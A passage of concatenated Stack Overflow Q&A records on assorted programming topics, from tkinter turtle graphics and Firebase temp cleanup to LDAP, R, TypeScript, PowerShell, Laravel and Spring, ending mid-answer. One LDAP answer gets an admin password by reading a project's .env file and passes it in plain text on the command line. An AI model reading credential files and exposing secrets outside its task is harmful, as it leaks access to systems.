*http://www.eg.bucknell.edu/~hyde/Python3/TurtleDirections.html
*https://www.reddit.com/r/learnpython/comments/4qdcmw/can_you_add_turtle_graphics_to_a_tkinter_window/
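If screen-level control is also wanted (background colour, animation tracer, key events), a minimal sketch is to wrap the canvas in a TurtleScreen first; this uses only the standard turtle API:
import tkinter as tk
import turtle

root = tk.Tk()
canvas = tk.Canvas(master = root, width = 500, height = 500)
canvas.pack()
screen = turtle.TurtleScreen(canvas) # wraps the existing tkinter canvas
screen.bgcolor("lightgrey")          # screen-level settings become available
t = turtle.RawTurtle(screen)
t.forward(100)
root.mainloop()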
| stackoverflow | {
"language": "en",
"length": 176,
"provenance": "stackexchange_0000F.jsonl.gz:900502",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653500"
} |
40fac06313a2844e587b756f7e5ab924b22b8df7 | Stackoverflow Stackexchange
Q: Cleanup Temp Directory Firebase cloud Functions I am using Cloud Functions for Firebase for my web app. I need to create a thumbnail for any image uploaded to Firebase Storage. For that I need to download the uploaded file from the GCS bucket to a temp directory (using mkdirp-promise) and apply an ImageMagick command to create a thumbnail. (Firebase Function Samples - Generate Thumbnail)
return mkdirp(tempLocalDir).then(() => {
console.log('Temporary directory has been created', tempLocalDir);
// Download file from bucket.
return bucket.file(filePath).download({
destination: tempLocalFile
});
}).then(() => {
//rest of the program
});
My Question is:
*
*where is this temp directory created?
*Is this temp storage counted against my firebase cloud storage or Google cloud Storage quota?
*How can I clean up my temp directory after I have successfully uploaded the newly created thumbnail file, so that I don't exceed my quota?
A: *
*The temp directory is created in tmpfs, which in the Cloud Functions environment is kept in memory. See https://cloud.google.com/functions/pricing#local_disk
*Since tmpfs is kept in memory, it counts against the memory usage of your Functions.
*You remove a directory by calling fs.rmdir(): https://nodejs.org/api/fs.html#fs_fs_rmdir_path_callback
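For illustration, a minimal sketch of the cleanup step in the function itself (Node.js; tempLocalFile, tempLocalThumbFile and thumbFilePath are placeholder names based on the question, not the official sample's exact variables):
const fs = require('fs');
// After generating the thumbnail, upload it, then delete both local copies
// so the in-memory tmpfs is freed for later invocations.
return bucket.upload(tempLocalThumbFile, { destination: thumbFilePath })
    .then(() => {
        fs.unlinkSync(tempLocalFile);      // downloaded original
        fs.unlinkSync(tempLocalThumbFile); // generated thumbnail
    });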
| Q: Cleanup Temp Directory Firebase cloud Functions I am using Cloud Functions for Firebase for my web app. I need to create a thumbnail for any image uploaded to Firebase Storage. For that I need to download the uploaded file from the GCS bucket to a temp directory (using mkdirp-promise) and apply an ImageMagick command to create a thumbnail. (Firebase Function Samples - Generate Thumbnail)
return mkdirp(tempLocalDir).then(() => {
console.log('Temporary directory has been created', tempLocalDir);
// Download file from bucket.
return bucket.file(filePath).download({
destination: tempLocalFile
});
}).then(() => {
//rest of the program
});
My Question is:
*
*where is this temp directory created?
*Is this temp storage counted against my firebase cloud storage or Google cloud Storage quota?
*How can I clean up my temp directory after I have successfully uploaded the newly created thumbnail file, so that I don't exceed my quota?
A: *
*The temp directory is created in tmpfs, which in the Cloud Functions environment is kept in memory. See https://cloud.google.com/functions/pricing#local_disk
*Since tmpfs is kept in memory, it counts against the memory usage of your Functions.
*You remove a directory by calling fs.rmdir(): https://nodejs.org/api/fs.html#fs_fs_rmdir_path_callback
A: Here's some of the code I wrote for the "Fire!sale" continuous deployment demo at Google I/O (warning: it's in TypeScript, not JavaScript. This lets me use await/async which is easier to read, especially in the case of error handling)
import * as fs from 'fs';
import * as os from 'os';
import * as path from 'path';
import * as _ from 'lodash'; // needed for _.map in rmrfAsync below
let tempy = require('tempy'); // No .d.ts
function rmFileAsync(file: string) {
return new Promise((resolve, reject) => {
fs.unlink(file, (err) => {
if (err) {
reject(err);
} else {
resolve();
}
})
})
}
function statAsync(file: string): Promise<fs.Stats> {
return new Promise((resolve, reject) => {
fs.stat(file, (err, stat) => {
if (err) {
reject(err);
} else {
resolve(stat);
}
})
})
}
async function rmrfAsync(dir: string) {
// Note: I should have written this to be async too
let files = fs.readdirSync(dir);
return Promise.all(_.map(files, async (file) => {
file = path.join(dir, file);
let stat = await statAsync(file);
if (stat.isFile()) {
return rmFileAsync(file);
}
return rmrfAsync(file);
}));
}
Then inside my Cloud Functions code I could do something like the following:
export let myFunction = functions.myTrigger.onEvent(async event => {
// If I want to be extra aggressive to handle any timeouts/failures and
// clean up before execution:
try {
await rmrfAsync(os.tmpdir());
} catch (err) {
console.log('Failed to clean temp directory. Deploy may fail.', err);
}
// In an async function we can use try/finally to ensure code runs
// without changing the error status of the function.
// Gets a new directory under /tmp so we're guaranteed to have a
// clean slate. (Declared before the try block so the finally
// clause can still see it.)
let dir = tempy.directory();
try {
    // ... do stuff ...
} finally {
    await rmrfAsync(dir);
}
}
| stackoverflow | {
"language": "en",
"length": 455,
"provenance": "stackexchange_0000F.jsonl.gz:900513",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653533"
} |
655e878f5e5cfe7347ea6d883daca78f2eb9a2ec | Stackoverflow Stackexchange
Q: How to delete a user from the LDAP container I need to delete a user from the LDAP container.
First of all I searched for the user using :
$ ldapsearch -x -b "dc=tuleap,dc=local" -s sub "objectclass=*"
I found the user, and then I executed:
$ ldapdelete -v -D "uid=user,dc=tuleap,dc=local" -w userpassword
I get this :
ldap_initialize( DEFAULT )
ldap_bind: Invalid credentials (49)
Can anyone help resolve this issue?
A: From what you put in your comments, the error Invalid credentials (49) comes from the incorrect DN you provided for your user :
uid=user,dc=tuleap,dc=local instead of uid=user,ou=people,dc=tuleap,dc=local
Now for the syntax of your command, you have to specify which entry you want to delete from the directory.
From the documentation :
If one or more DN arguments are provided, entries with those
Distinguished Names are deleted. Each DN should be provided using the
LDAPv3 string representation as defined in RFC 4514
For example :
ldapdelete -v -D "uid=user,ou=people,dc=tuleap,dc=local" -W "uid=user2,ou=people,dc=tuleap,dc=local"
Which will try to delete the entry : uid=user2,ou=people,dc=tuleap,dc=local
| Q: How to delete a user from the LDAP container I need to delete a user from the LDAP container.
First of all I searched for the user using :
$ ldapsearch -x -b "dc=tuleap,dc=local" -s sub "objectclass=*"
I found the user, and then I executed:
$ ldapdelete -v -D "uid=user,dc=tuleap,dc=local" -w userpassword
I get this :
ldap_initialize( DEFAULT )
ldap_bind: Invalid credentials (49)
Can anyone help resolve this issue?
A: From what you put in your comments, the error Invalid credentials (49) comes from the incorrect DN you provided for your user :
uid=user,dc=tuleap,dc=local instead of uid=user,ou=people,dc=tuleap,dc=local
Now for the syntax of your command, you have to specify which entry you want to delete from the directory.
From the documentation :
If one or more DN arguments are provided, entries with those
Distinguished Names are deleted. Each DN should be provided using the
LDAPv3 string representation as defined in RFC 4514
For example :
ldapdelete -v -D "uid=user,ou=people,dc=tuleap,dc=local" -W "uid=user2,ou=people,dc=tuleap,dc=local"
Which will try to delete the entry : uid=user2,ou=people,dc=tuleap,dc=local
A: After a long period of research, I found a solution.
First I searched for the user using ldapsearch
ldapsearch -x -b "uid=user,ou=people,dc=tuleap,dc=local" -s sub "objectclass=*"
After that I deleted the user using ldapdelete
ldapdelete -v -c -D "cn=Manager,dc=tuleap,dc=local" -w ladap-manager-password "uid=user,ou=people,dc=tuleap,dc=local"
Executing cat .env in the tuleap directory, I found the LDAP manager password.
| stackoverflow | {
"language": "en",
"length": 225,
"provenance": "stackexchange_0000F.jsonl.gz:900519",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653559"
} |
7a15f04a44f2969c41476be514ee735a251e1bb5 | Stackoverflow Stackexchange
Q: Adding a traditional legend to dumbbell plot in `ggalt::geom_dumbbell` in `R` How to add a traditional legend to dumbbell plot created using ggalt::geom_dumbbell in R?
This question has an answer with an in-chart legend. How to map the aesthetics to get a separate legend for the points on the side/bottom ?
library(ggalt)
df <- data.frame(trt=LETTERS[1:5], l=c(20, 40, 10, 30, 50), r=c(70, 50, 30, 60, 80))
ggplot(df, aes(y=trt, x=l, xend=r)) +
geom_dumbbell(size=3, color="#e3e2e1",
colour_x = "red", colour_xend = "blue",
dot_guide=TRUE, dot_guide_size=0.25) +
theme_bw()
A: One way to get a legend is to add a points layer based on the dataset in long format, mapping color to the grouping variable.
First, make a long format dataset via gather from tidyr.
df2 = tidyr::gather(df, group, value, -trt)
Then make the plot, adding the new points layer with the long dataset and using scale_color_manual to set colors. I moved the geom_dumbbell specific aesthetics into that layer.
ggplot(df, aes(y = trt)) +
geom_point(data = df2, aes(x = value, color = group), size = 3) +
geom_dumbbell(aes(x = l, xend = r), size=3, color="#e3e2e1",
colour_x = "red", colour_xend = "blue",
dot_guide=TRUE, dot_guide_size=0.25) +
theme_bw() +
scale_color_manual(name = "", values = c("red", "blue") )
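As an aside, on newer tidyr (>= 1.0) the same reshaping step would use pivot_longer instead of the now-retired gather; a one-line sketch:
df2 = tidyr::pivot_longer(df, cols = c(l, r), names_to = "group", values_to = "value")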
| Q: Adding a traditional legend to dumbbell plot in `ggalt::geom_dumbbell` in `R` How to add a traditional legend to dumbbell plot created using ggalt::geom_dumbbell in R?
This question has an answer with an in-chart legend. How to map the aesthetics to get a separate legend for the points on the side/bottom ?
library(ggalt)
df <- data.frame(trt=LETTERS[1:5], l=c(20, 40, 10, 30, 50), r=c(70, 50, 30, 60, 80))
ggplot(df, aes(y=trt, x=l, xend=r)) +
geom_dumbbell(size=3, color="#e3e2e1",
colour_x = "red", colour_xend = "blue",
dot_guide=TRUE, dot_guide_size=0.25) +
theme_bw()
A: One way to get a legend is to add a points layer based on the dataset in long format, mapping color to the grouping variable.
First, make a long format dataset via gather from tidyr.
df2 = tidyr::gather(df, group, value, -trt)
Then make the plot, adding the new points layer with the long dataset and using scale_color_manual to set colors. I moved the geom_dumbbell specific aesthetics into that layer.
ggplot(df, aes(y = trt)) +
geom_point(data = df2, aes(x = value, color = group), size = 3) +
geom_dumbbell(aes(x = l, xend = r), size=3, color="#e3e2e1",
colour_x = "red", colour_xend = "blue",
dot_guide=TRUE, dot_guide_size=0.25) +
theme_bw() +
scale_color_manual(name = "", values = c("red", "blue") )
| stackoverflow | {
"language": "en",
"length": 198,
"provenance": "stackexchange_0000F.jsonl.gz:900532",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653597"
} |
7a2b111c29607540246c12b4deb8e79bd292df72 | Stackoverflow Stackexchange
Q: Typescript: Declare functions without implementing them Is it possible to declare that a class has certain functions without implementing them?
I need this because I create a class that is then passed to a JS framework which adds a couple of functions. I want to be able to call those functions as well, without reimplementing them, redirecting, or casting.
Example:
//example class
class AppComponent {
constructor() {}
}
//create class
var comp: AppComponent = new AppComponent();
//hand over to framework
fw.define("Component", comp);
//now I want to be able to call the added functions such as:
comp.setModel(/*some model*/);
A: You may declare the function without implementing it.
//example class
class AppComponent {
constructor() { }
setModel: () => void;
}
//create class
var comp: AppComponent = new AppComponent();
//hand over to framework
fw.define("Component", comp);
//now I want to be able to call the added functions such as:
comp.setModel(/*some model*/);
| Q: Typescript: Declare functions without implementing them Is it possible to declare that a class has certain functions without implementing them?
I need this because I create a class that is then passed to a JS framework which adds a couple of functions. I want to be able to call those functions as well, without reimplementing them, redirecting, or casting.
Example:
//example class
class AppComponent {
constructor() {}
}
//create class
var comp: AppComponent = new AppComponent();
//hand over to framework
fw.define("Component", comp);
//now I want to be able to call the added functions such as:
comp.setModel(/*some model*/);
A: You may declare the function without implementing it.
//example class
class AppComponent {
constructor() { }
setModel: () => void;
}
//create class
var comp: AppComponent = new AppComponent();
//hand over to framework
fw.define("Component", comp);
//now I want to be able to call the added functions such as:
comp.setModel(/*some model*/);
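An alternative sketch uses TypeScript's class/interface declaration merging, so the framework-added method exists only at the type level and no instance field is emitted:
//the interface merges with the class of the same name
interface AppComponent {
    setModel(model: any): void;
}
class AppComponent {
    constructor() {}
}
var comp: AppComponent = new AppComponent();
fw.define("Component", comp);
comp.setModel(/*some model*/); //type-checks; the implementation comes from the framework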
| stackoverflow | {
"language": "en",
"length": 149,
"provenance": "stackexchange_0000F.jsonl.gz:900540",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653623"
} |
ef77e8b054dfab91e870402a368b334122b67bed | Stackoverflow Stackexchange
Q: The type or namespace name 'Relational' does not exist in the namespace 'Microsoft.EntityFrameworkCore' In an ASP.Net Core 1.1 web application, in VS 2017, I need to reference the package:
Microsoft.EntityFrameworkCore.Relational
(this is in order to call stored procedures with result sets as described here:
How to run stored procedures in Entity Framework Core?)
When installing the package from PM console, with:
Install-Package Microsoft.EntityFrameworkCore.Relational
I get "Successfully installed 'Microsoft.EntityFrameworkCore.Relational 1.1.2'"
But when I add the line:
using Microsoft.EntityFrameworkCore.Relational;
at the top of the file, the word "Relational" has a red squiggle under with the error:
The type or namespace name 'Relational' does not exist in the namespace 'Microsoft.EntityFrameworkCore' (are you missing an assembly reference?)
I isolated the problem to creating a new project of type "ASP.Net Core Web Application (.Net Framework)", selecting the template for an empty ASP.Net Core 1.1 project, then installing the above package. I still get the same error.
TIA
A: Microsoft.EntityFrameworkCore.Relational is an assembly. There is no such namespace in EF Core.
The FromSql method is defined in the Microsoft.EntityFrameworkCore namespace, RelationalQueryableExtensions class, so all you need to get access to it is the typical
using Microsoft.EntityFrameworkCore;
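For illustration, a minimal sketch of the stored-procedure call once that using directive is in place (MyEntities and MyStoredProc are placeholder names, not from the question):
using Microsoft.EntityFrameworkCore;

//FromSql is an extension method from RelationalQueryableExtensions,
//brought into scope by the using directive above.
var results = context.MyEntities
    .FromSql("EXEC MyStoredProc @p0", someParam)
    .ToList();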
| Q: The type or namespace name 'Relational' does not exist in the namespace 'Microsoft.EntityFrameworkCore' In an ASP.Net Core 1.1 web application, in VS 2017, I need to reference the package:
Microsoft.EntityFrameworkCore.Relational
(this is in order to call stored procedures with result sets as described here:
How to run stored procedures in Entity Framework Core?)
When installing the package from PM console, with:
Install-Package Microsoft.EntityFrameworkCore.Relational
I get "Successfully installed 'Microsoft.EntityFrameworkCore.Relational 1.1.2'"
But when I add the line:
using Microsoft.EntityFrameworkCore.Relational;
at the top of the file, the word "Relational" has a red squiggle under with the error:
The type or namespace name 'Relational' does not exist in the namespace 'Microsoft.EntityFrameworkCore' (are you missing an assembly reference?)
I isolated the problem to creating a new project of type "ASP.Net Core Web Application (.Net Framework)", selecting the template for an empty ASP.Net Core 1.1 project, then installing the above package. I still get the same error.
TIA
A: Microsoft.EntityFrameworkCore.Relational is an assembly. There is no such namespace in EF Core.
The FromSql method is defined in the Microsoft.EntityFrameworkCore namespace, RelationalQueryableExtensions class, so all you need to get access to it is the typical
using Microsoft.EntityFrameworkCore;
| stackoverflow | {
"language": "en",
"length": 190,
"provenance": "stackexchange_0000F.jsonl.gz:900554",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653667"
} |
5aa1d4ed27f510ebc62f78d34f23486e594ea177 | Stackoverflow Stackexchange
Q: Typescript (Angular) : unit test a subscription I have a simple function that does this
ngOnInit() {
if (this.session.getToken()) {
this.isUserLogged = true;
}
this.loadingObserver = this.session.loadingObservable.subscribe(loading => this.isLoading = loading);
}
and my test is as follows
it('Testing ngOnInit() ...', async(() => {
let spy = spyOn(services.session, 'getToken').and.returnValue('token');
services.session.loadingObservable.subscribe(any => expect(component.isLoading).toEqual(false));
component.ngOnInit();
expect(component.isUserLogged).toEqual(true);
expect(spy).toHaveBeenCalled();
}));
But in the code coverage of my application, the subscribe isn't covered. In fact, expecting false also works.
Do you have any idea how to test a subscription?
A: Whether your handler code gets called or not on subscribe depends on the nature of the Observable you are subscribing to -- specifically its "hotness" or "coldness". Read this excellent explanation -- https://blog.thoughtram.io/angular/2016/06/16/cold-vs-hot-observables.html -- and see where your "loadingObservable" falls in the taxonomy. But I suspect as was suggested in the comments, you need to force it to fire in your unit test.
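A minimal sketch of forcing the emission from the test, assuming the service can be stubbed so that loadingObservable is backed by a Subject (spyOnProperty is standard Jasmine, but the getter-based wiring here is an assumption about the session service):
import { Subject } from 'rxjs/Subject';

const loading$ = new Subject<boolean>();
spyOnProperty(services.session, 'loadingObservable', 'get').and.returnValue(loading$);

component.ngOnInit();
loading$.next(true); // force the subscription handler to run

expect(component.isLoading).toEqual(true);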
| Q: Typescript (Angular) : unit test a subscription I have a simple function that does this
ngOnInit() {
if (this.session.getToken()) {
this.isUserLogged = true;
}
this.loadingObserver = this.session.loadingObservable.subscribe(loading => this.isLoading = loading);
}
and my test is as follows
it('Testing ngOnInit() ...', async(() => {
let spy = spyOn(services.session, 'getToken').and.returnValue('token');
services.session.loadingObservable.subscribe(any => expect(component.isLoading).toEqual(false));
component.ngOnInit();
expect(component.isUserLogged).toEqual(true);
expect(spy).toHaveBeenCalled();
}));
But in the code coverage of my application, the subscribe isn't covered. In fact, expecting false also works.
Do you have any idea how to test a subscription?
A: Whether your handler code gets called or not on subscribe depends on the nature of the Observable you are subscribing to -- specifically its "hotness" or "coldness". Read this excellent explanation -- https://blog.thoughtram.io/angular/2016/06/16/cold-vs-hot-observables.html -- and see where your "loadingObservable" falls in the taxonomy. But I suspect as was suggested in the comments, you need to force it to fire in your unit test.
| stackoverflow | {
"language": "en",
"length": 151,
"provenance": "stackexchange_0000F.jsonl.gz:900563",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653684"
} |
acb546960dcab0dbf7b5f05ae2a2c994656ac319 | Stackoverflow Stackexchange
Q: Android: Too much allocated memory while using png instead of vector images I am using 10 png images of size 20-30kb in imageView, but the allocated memory increases from 70mb to 270mb when this activity loads.
So why is so much memory allocated for these images?
This is the screenshot of memory allocation
This is one of my images.
A: File size doesn't matter. Your image may be only 20 KB on disk, but its resolution is quite big. When an image is loaded into memory it takes memory equal to totalNoOfDotsInImageBitmap * 4 bytes,
where totalNoOfDotsInImageBitmap = width * height of the image.
4 bytes: because of ARGB (1 byte per channel) for a single dot of the bitmap.
So reducing the width and height of the image may solve your problem.
| Q: Android: Too much allocated memory while using png instead of vector images I am using 10 png images of size 20-30kb in imageView, but the allocated memory increases from 70mb to 270mb when this activity loads.
So why is so much memory allocated for these images?
This is the screenshot of memory allocation
This is one of my images.
A: File size doesn't matter. Your image may be only 20 KB on disk, but its resolution is quite big. When an image is loaded into memory it takes memory equal to totalNoOfDotsInImageBitmap * 4 bytes,
where totalNoOfDotsInImageBitmap = width * height of the image.
4 bytes: because of ARGB (1 byte per channel) for a single dot of the bitmap.
So reducing the width and height of the image may solve your problem.
A: Depending on where you are putting the assets it may be trying to load a file that is too large.
For instance, if you have it in drawable or drawable-nodpi, a device with a low density will still try to load a potentially large image.
Also, bear in mind that the actual file size is not that important as it is probably small due to compression, but the image has to be converted to bitmap when it gets drawn, so if the actual size is too much that can also cause an OOM.
If you have access to the original I would recommend using a vector drawable (it's a simple shape so should be ok) and AS will generate the required PNG files for older versions.
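For illustration, a minimal sketch of decoding a downsampled bitmap with the standard BitmapFactory API (R.drawable.my_image is a placeholder):
BitmapFactory.Options opts = new BitmapFactory.Options();
opts.inSampleSize = 4; // decode at 1/4 width and height, roughly 1/16 the memory
Bitmap bitmap = BitmapFactory.decodeResource(getResources(), R.drawable.my_image, opts);
// e.g. a 2000x1500 source: 2000*1500*4 bytes is about 11.4 MB full size, about 0.7 MB at inSampleSize = 4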
| stackoverflow | {
"language": "en",
"length": 254,
"provenance": "stackexchange_0000F.jsonl.gz:900568",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653697"
} |
0b696a33d3d7d88a22d56840a4641f29849e4b20 | Stackoverflow Stackexchange
Q: vue + mailchimp ajax signup cors error Using axios in a Vue.js project, I'm having issues calling the Mailchimp API to sign up an email for a newsletter.
axios.post('//myappname.us9.list-manage.com/subscribe/post-json', {
u: 'abcde',
id: '12345',
EMAIL: this.email
}).then(response => {
console.log(response)
}).catch(response => {
console.log(response)
})
This results in an error in the OPTIONS preflight:
Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' header is present on the requested resource.
How can I bypass these CORS issues? I tried JSONP, and that semi-works. My request comes through, but I can't handle the response very well, as I don't really get a response, just an error, because the response isn't a JSONP response but an ordinary JSON response.
I used the vue-jsonp package for the jsonp test.
Any pointers? Would be much appreciated. Thanks.
| Q: vue + mailchimp ajax signup cors error Using axios in a Vue.js project, I'm having issues calling the Mailchimp API to sign up an email for a newsletter.
axios.post('//myappname.us9.list-manage.com/subscribe/post-json', {
u: 'abcde',
id: '12345',
EMAIL: this.email
}).then(response => {
console.log(response)
}).catch(response => {
console.log(response)
})
This results in an error in the OPTIONS preflight:
Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' header is present on the requested resource.
How can I bypass these CORS issues? I tried JSONP, and that semi-works. My request comes through, but I can't handle the response very well, as I don't really get a response, just an error, because the response isn't a JSONP response but an ordinary JSON response.
I used the vue-jsonp package for the jsonp test.
Any pointers? Would be much appreciated. Thanks.
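For reference, a hedged sketch of the JSONP route (the $jsonp call follows the vue-jsonp plugin's documented Promise API; note that Mailchimp's post-json endpoint expects the JSONP callback name in a c parameter, so the plugin's callback-parameter name may need to be configured to 'c'):
// in a component method, after Vue.use(VueJsonp)
this.$jsonp('https://myappname.us9.list-manage.com/subscribe/post-json', {
  u: 'abcde',
  id: '12345',
  EMAIL: this.email
}).then(json => {
  // Mailchimp replies with { result: 'success' | 'error', msg: '...' }
  console.log(json.result, json.msg)
})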
| stackoverflow | {
"language": "en",
"length": 135,
"provenance": "stackexchange_0000F.jsonl.gz:900582",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653760"
} |
dca5cb64473a3da5c6543364ea8d4969b9f292ea | Stackoverflow Stackexchange
Q: PowerShell -- Accessing a JArray inside a JObject I have a Json object
{
"ProjectDirectory": "C:\\Main",
"SiteName": "RemoteOrder",
"ParentPath": "/Areas//Views",
"VirtualDirectories": [
{
"Name": "Alerts",
"Path": "\\Areas\\RemoteOrder\\Views\\Alerts"
},
{
"Name": "Analytics",
"Path": "\\Areas\\RemoteOrder\\Views\\Analytics"
},
{
"Name": "Auth",
"Path": "\\Areas\\RemoteOrder\\Views\\Auth"
}
]
}
that I created by
$config = [Newtonsoft.Json.Linq.JObject]::Parse($file)
I can access things like
$config["ProjectDirectory"]
$config["VirtualDirectories"]
But I can not get to the element inside the VirtualDirectories JArray
I confirmed
$config["VirtualDirectories"][0].GetType() // JObject
$config["VirtualDirectories"].GetType() // JArray
$config // JObject
I have tried
$config["VirtualDirectories"][0]["Name"]
$config["VirtualDirectories"][0]["Path"]
$config["VirtualDirectories"][0][0]
$config["VirtualDirectories"][0].GetValue("Name")
When I try
$config["VirtualDirectories"][0].ToString()
I get
{
"Name": "Alerts",
"Path": "\\Areas\\RemoteOrder\\Views\\Alerts"
}
What I am really trying to do is access it in a loop, but again I cannot seem to access the JObject elements.
A: You are close. $config["VirtualDirectories"][0]["Name"] will give you a JValue containing the text. You just need to use the Value property from there to get the actual string. Here is how you would do it in a ForEach loop:
$config = [Newtonsoft.Json.Linq.JObject]::Parse($file)
ForEach ($dir in $config["VirtualDirectories"])
{
$name = $dir["Name"].Value
$path = $dir["Path"].Value
...
}
| Q: PowerShell -- Accessing a JArray inside a JObject I have a Json object
{
"ProjectDirectory": "C:\\Main",
"SiteName": "RemoteOrder",
"ParentPath": "/Areas//Views",
"VirtualDirectories": [
{
"Name": "Alerts",
"Path": "\\Areas\\RemoteOrder\\Views\\Alerts"
},
{
"Name": "Analytics",
"Path": "\\Areas\\RemoteOrder\\Views\\Analytics"
},
{
"Name": "Auth",
"Path": "\\Areas\\RemoteOrder\\Views\\Auth"
}
]
}
that I created by
$config = [Newtonsoft.Json.Linq.JObject]::Parse($file)
I can access things like
$config["ProjectDirectory"]
$config["VirtualDirectories"]
But I can not get to the element inside the VirtualDirectories JArray
I confirmed
$config["VirtualDirectories"][0].GetType() // JObject
$config["VirtualDirectories"].GetType() // JArray
$config // JObject
I have tried
$config["VirtualDirectories"][0]["Name"]
$config["VirtualDirectories"][0]["Path"]
$config["VirtualDirectories"][0][0]
$config["VirtualDirectories"][0].GetValue("Name")
When I try
$config["VirtualDirectories"][0].ToString()
I get
{
"Name": "Alerts",
"Path": "\\Areas\\RemoteOrder\\Views\\Alerts"
}
What I am really trying to do is access it in a loop, but again I cannot seem to access the JObject elements.
A: You are close. $config["VirtualDirectories"][0]["Name"] will give you a JValue containing the text. You just need to use the Value property from there to get the actual string. Here is how you would do it in a ForEach loop:
$config = [Newtonsoft.Json.Linq.JObject]::Parse($file)
ForEach ($dir in $config["VirtualDirectories"])
{
$name = $dir["Name"].Value
$path = $dir["Path"].Value
...
}
A: To complement Brian Rogers' helpful answer:
As a more convenient alternative to index syntax (["<name>"]) you can use property syntax
(.<name>), because the JObject instances returned have dynamic properties named for their keys:
$config = [Newtonsoft.Json.Linq.JObject]::Parse($file)
foreach ($dir in $config.VirtualDirectories) {
$name = $dir.Name.Value # as in Brian's answer: note the need for .Value
$path = $dir.Path.Value # ditto
# Sample output
"$name=$path" # outputs 'Alerts=\Areas\RemoteOrder\Views\Alerts', ...
}
I presume that the reason you chose to work with Json.NET types directly is performance compared to PowerShell's built-in ConvertFrom-Json cmdlet.
*
*As an aside: There is a PowerShell wrapper for Json.NET that you can install with Install-Module -Scope CurrentUser newtonsoft.json, for instance, which implicitly gives you access to the [Newtonsoft.Json.Linq.JObject] type. However, this wrapper - which represents objects as ordered hashtables - is even slower than ConvertFrom-Json.
*Aside from performance, the following limitations of ConvertFrom-Json may make it necessary to use a third-party library such as Json.Net anyway:
*
*Empty-string keys are not supported.
*Keys that differ in case only (e.g., foo vs. Foo) are not supported.
For contrast, here's the equivalent - but generally slower - ConvertFrom-Json solution:
ConvertFrom-Json represents the JSON objects as [pscustomobject] instances whose properties are named for the keys, allowing for a more natural syntax without the need to access .Value:
$config = ConvertFrom-Json $json
foreach ($dir in $config.VirtualDirectories) {
$name = $dir.Name # no .Value needed
$path = $dir.Path # ditto
# Sample output
"$name=$path" # outputs 'Alerts=\Areas\RemoteOrder\Views\Alerts', ...
}
| stackoverflow | {
"language": "en",
"length": 424,
"provenance": "stackexchange_0000F.jsonl.gz:900584",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653771"
} |
7210bcdb50eb709649cf1c70746e0f639260c072 | Stackoverflow Stackexchange
Q: Laravel: AJAX request endpoints in routes/api.php or routes/web.php? I have a Laravel app where I fetch and update data asynchronously from my frontend. My question is: Do the endpoints for the AJAX requests go into the routes/api.php or in the routes/web.php?
A: The routes/web.php file defines routes that are for your web interface. These routes are assigned the web middleware group, which provides features like session state and CSRF protection. So generally, all your routes that use the web middleware go in routes/web.php.
If your route uses the api middleware, it goes in routes/api.php.
| Q: Laravel: AJAX request endpoints in routes/api.php or routes/web.php? I have a Laravel app where I fetch and update data asynchronously from my frontend. My question is: Do the endpoints for the AJAX requests go into the routes/api.php or in the routes/web.php?
A: The routes/web.php file defines routes that are for your web interface. These routes are assigned the web middleware group, which provides features like session state and CSRF protection. So generally, all your routes that use the web middleware go in routes/web.php.
If your route uses the api middleware, it goes in routes/api.php.
A: Normally in web.php, as the routes will use the 'web' middleware to access the session and other web-related middleware (CSRF etc.).
api.php is dedicated to 'stateless' API calls, where you don't want to use the session but instead use stateless-specific features such as API authentication, throttling and so on.
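For illustration, a minimal sketch of the same endpoint in each file (controller and URI names are placeholders):
// routes/web.php - session + CSRF protected; suits same-site AJAX
Route::post('/items/{id}', 'ItemController@update');

// routes/api.php - stateless; URIs are automatically prefixed with /api
Route::middleware('auth:api')->post('/items/{id}', 'ItemController@update');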
| stackoverflow | {
"language": "en",
"length": 144,
"provenance": "stackexchange_0000F.jsonl.gz:900636",
"question_score": "13",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653927"
} |
c16884f2035bb6cfdf336a4183afbb83a3eb002a | Stackoverflow Stackexchange
Q: How to set FlushMode to COMMIT in SPRING DATA for a single method I would like a single method to run without FlushMode.ALWAYS.
So I need setFlushMode(FlushMode.COMMIT), but I don't know how to do that, and I'm starting to think it's not possible using Spring Data.
I tried to autowire SessionFactory and do this
sessionFactory.getCurrentSession().setFlushMode(FlushMode.COMMIT);
But I got this error
No qualifying bean of type [org.hibernate.SessionFactory] found for dependency...
What I understand is that I can't autowire session factory, so I can't use that way of setting flush mode.
Then my question is
Is there a way to set flush mode for a single method using spring data? How?
A: I ended up annotating my find method in my JpaRepository interface like this:
@QueryHints(value = { @QueryHint(name = org.hibernate.annotations.QueryHints.FLUSH_MODE, value = "COMMIT") })
List<ConcatenaCep> findByCep(Integer cep);
| Q: How to set FlushMode to COMMIT in SPRING DATA for a single method I would like a single method to run without FlushMode.ALWAYS.
So I need setFlushMode(FlushMode.COMMIT), but I don't know how to do that, and I'm starting to think it's not possible using Spring Data.
I tried to autowire SessionFactory and do this
sessionFactory.getCurrentSession().setFlushMode(FlushMode.COMMIT);
But I got this error
No qualifying bean of type [org.hibernate.SessionFactory] found for dependency...
What I understand is that I can't autowire session factory, so I can't use that way of setting flush mode.
Then my question is
Is there a way to set flush mode for a single method using spring data? How?
A: I ended up annotating my find method in my JpaRepository interface like this:
@QueryHints(value = { @QueryHint(name = org.hibernate.annotations.QueryHints.FLUSH_MODE, value = "COMMIT") })
